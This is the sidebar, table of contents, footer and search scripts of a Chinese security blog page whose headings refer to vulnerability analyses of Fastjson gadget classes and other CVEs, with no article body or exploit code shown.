                    <a href="https://github.com/securitycn" target="_blank" title="github">
                      
                        <i class="fa fa-fw fa-globe"></i>github</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="http://www.ja0k.com/images/wechat-qcode.jpg" target="_blank" title="wechat">
                      
                        <i class="fa fa-fw fa-globe"></i>wechat</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:securitycn@qq.com" target="_blank" title="E-mail">
                      
                        <i class="fa fa-fw fa-globe"></i>E-mail</a>
                  </span>
                
            </div>
          

          
          

          
          
		  
    <div class="links-of-blogroll motion-element links-of-blogroll-block">
      <div class="links-of-blogroll-title">
        <!-- modify icon to fire by szw -->
        <i class="fa fa-history fa-" aria-hidden="true"></i>
        近期文章
      </div>
      <ul class="links-of-blogroll-list">
        
        
          <li>
            <a href="/2020/06/28/【漏洞分析】CVE-2020-1948 Apache Dubbo RPC 反序列化漏洞分析/" title="【漏洞分析】CVE-2020-1948 Apache Dubbo 反序列化漏洞分析" target="_blank">【漏洞分析】CVE-2020-1948 Apache Dubbo 反序列化漏洞分析</a>
          </li>
        
          <li>
            <a href="/2020/06/05/【漏洞复现】CVE-2020-0796 SMBGhost RCE exp复现过程/media/" title="【漏洞复现】CVE-2020-0796 SMBGhost RCE exp复现过程" target="_blank">【漏洞复现】CVE-2020-0796 SMBGhost RCE exp复现过程</a>
          </li>
        
          <li>
            <a href="/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/" title="【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造" target="_blank">【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造</a>
          </li>
        
          <li>
            <a href="/2020/03/17/【漏洞分析+漏洞复现】通达OA任意文件上传漏洞分析及复现/" title="【漏洞分析&漏洞复现】通达OA任意文件上传和文件包含漏洞导致RCE分析及复现" target="_blank">【漏洞分析&漏洞复现】通达OA任意文件上传和文件包含漏洞导致RCE分析及复现</a>
          </li>
        
          <li>
            <a href="/2020/03/12/【漏洞通告】CVE-2020-0796Windows SMBv3远程代码执行漏洞安全通告（内含Exp视频和检测方法）/" title="【漏洞通告】CVE-2020-0796/Windows SMBv3远程代码执行漏洞安全通告(内含Exp视频和检测方法)" target="_blank">【漏洞通告】CVE-2020-0796/Windows SMBv3远程代码执行漏洞安全通告(内含Exp视频和检测方法)</a>
          </li>
        
      </ul>
    </div>


          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#一、事件背景"><span class="nav-number">1.</span> <span class="nav-text">一、事件背景</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#二、漏洞信息"><span class="nav-number">2.</span> <span class="nav-text">二、漏洞信息</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#三、漏洞分析"><span class="nav-number">3.</span> <span class="nav-text">三、漏洞分析</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#3-1-补丁对比"><span class="nav-number">3.1.</span> <span class="nav-text">3.1 补丁对比</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#1-org-apache-shiro-jndi-JndiObjectFactory"><span class="nav-number">3.1.1.</span> <span class="nav-text">1.org.apache.shiro.jndi.JndiObjectFactory</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#2-br-com-anteros-dbcp-AnterosDBCPConfig"><span class="nav-number">3.1.2.</span> <span class="nav-text">2. br.com.anteros.dbcp.AnterosDBCPConfig</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#3-org-apache-ignite-cache-jta-jndi-CacheJndiTmLookup"><span class="nav-number">3.1.3.</span> <span class="nav-text">3. org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#4-com-ibatis-sqlmap-engine-transaction-jta-JtaTransactionConfig"><span class="nav-number">3.1.4.</span> <span class="nav-text">4. com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig</span></a></li></ol></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#四、漏洞复现"><span class="nav-number">4.</span> <span class="nav-text">四、漏洞复现</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#五、修复建议"><span class="nav-number">5.</span> <span class="nav-text">五、修复建议</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#六、附录"><span class="nav-number">6.</span> <span class="nav-text">六、附录</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#本次分析及复现的相关工具地址"><span class="nav-number">6.1.</span> <span class="nav-text">本次分析及复现的相关工具地址</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#参考："><span class="nav-number">6.2.</span> <span class="nav-text">参考：</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

<div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">扫码关注公众号(SecurityCN)</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">14.5k</span>
  
</div>
<div class="powered-by">
<i class="fa fa-user-md"></i><span id="busuanzi_container_site_uv">
  本站访客数:<span id="busuanzi_value_site_uv"></span>
</span>
</div>

<div class="powered-by">
<i class="fa fa-user-md"></i>
Hosted by<a href="https://www.upyun.com/?utm_source=lianmeng&utm_medium=referral" style="border:0">
    <img src="/images/upyun_logo.min.svg" style="width: 60px; display: inline; vertical-align: middle;">
  </a>

</div>

        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i> 访问人数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>访问总量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      次
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  
  

  

  

  

</body>
</html>
